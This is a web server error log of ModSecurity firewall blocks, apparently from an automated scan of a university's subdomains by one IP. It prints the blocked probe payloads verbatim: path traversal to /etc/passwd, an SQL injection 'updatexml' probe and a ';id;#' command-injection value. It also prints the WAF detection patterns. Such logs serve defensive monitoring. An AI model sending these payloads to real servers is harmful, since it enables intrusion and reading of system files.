[Tue Aug 29 11:46:14.373186 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FsCo-f0AAAib50gAAAAA"]
[Tue Aug 29 11:46:14.421003 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAhzviIAAAAx"]
[Tue Aug 29 11:46:14.437449 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FsCo-f0AAAib50sAAAAA"]
[Tue Aug 29 11:46:14.441043 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FsCo-f0AAAhl0BAAAAAi"]
[Tue Aug 29 11:46:14.456890 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAi-RAIAAAAH"]
[Tue Aug 29 11:46:14.460845 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAhzviQAAAAx"]
[Tue Aug 29 11:46:14.478219 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAib50wAAAAA"]
[Tue Aug 29 11:46:14.498359 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FsCo-f0AAAi-RAQAAAAH"]
[Tue Aug 29 11:46:14.518935 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAhl0BIAAAAi"]
[Tue Aug 29 11:46:15.347908 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAhzviYAAAAx"]
[Tue Aug 29 11:46:15.348550 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAi-RAUAAAAH"]
[Tue Aug 29 11:46:15.351898 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAib504AAAAA"]
[Tue Aug 29 11:46:15.368870 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14F8Co-f0AAAhzvicAAAAx"]
[Tue Aug 29 11:46:15.385319 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAhl0BQAAAAi"]
[Tue Aug 29 11:46:15.409367 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14F8Co-f0AAAhT32gAAAAD"]
[Tue Aug 29 11:46:15.409438 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAhBSGcAAAAX"]
[Tue Aug 29 11:46:15.449407 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAhrqQIAAAAo"]
[Tue Aug 29 11:46:15.450711 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAhzvioAAAAx"]
[Tue Aug 29 11:46:15.457583 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAipS6oAAAAF"]
[Tue Aug 29 11:46:15.459876 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAdxUr4AAAAC"]
[Tue Aug 29 11:46:15.588703 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAhl0BYAAAAi"]
[Tue Aug 29 11:46:15.607264 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAhrqQQAAAAo"]
[Tue Aug 29 11:46:16.371331 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14GMCo-f0AAAhzvi0AAAAx"]
[Tue Aug 29 11:46:18.372111 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAi0JKkAAAAK"]
[Tue Aug 29 11:46:18.432370 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAi-RAsAAAAH"]
[Tue Aug 29 11:46:18.434449 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAhgoNgAAAAb"]
[Tue Aug 29 11:46:18.460122 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAhgoNkAAAAb"]
[Tue Aug 29 11:46:18.462959 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAi2yDIAAAAN"]
[Tue Aug 29 11:46:18.468167 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAdxUssAAAAC"]
[Tue Aug 29 11:46:18.469571 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAib52AAAAAA"]
[Tue Aug 29 11:46:18.479856 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAi-RA0AAAAH"]
[Tue Aug 29 11:46:18.498842 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAi-RA4AAAAH"]
[Tue Aug 29 11:46:18.508880 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAhl0B0AAAAi"]
[Tue Aug 29 11:46:19.395377 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAhBSGoAAAAX"]
[Tue Aug 29 11:46:19.457432 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cities"] [unique_id "ZO14G8Co-f0AAAhrqRMAAAAo"]
[Tue Aug 29 11:46:19.478654 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22package\\x22:\\x22 found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAhgoN8AAAAb"]
[Tue Aug 29 11:46:19.522458 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22package\\x22:\\x22 found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAib52cAAAAA"]
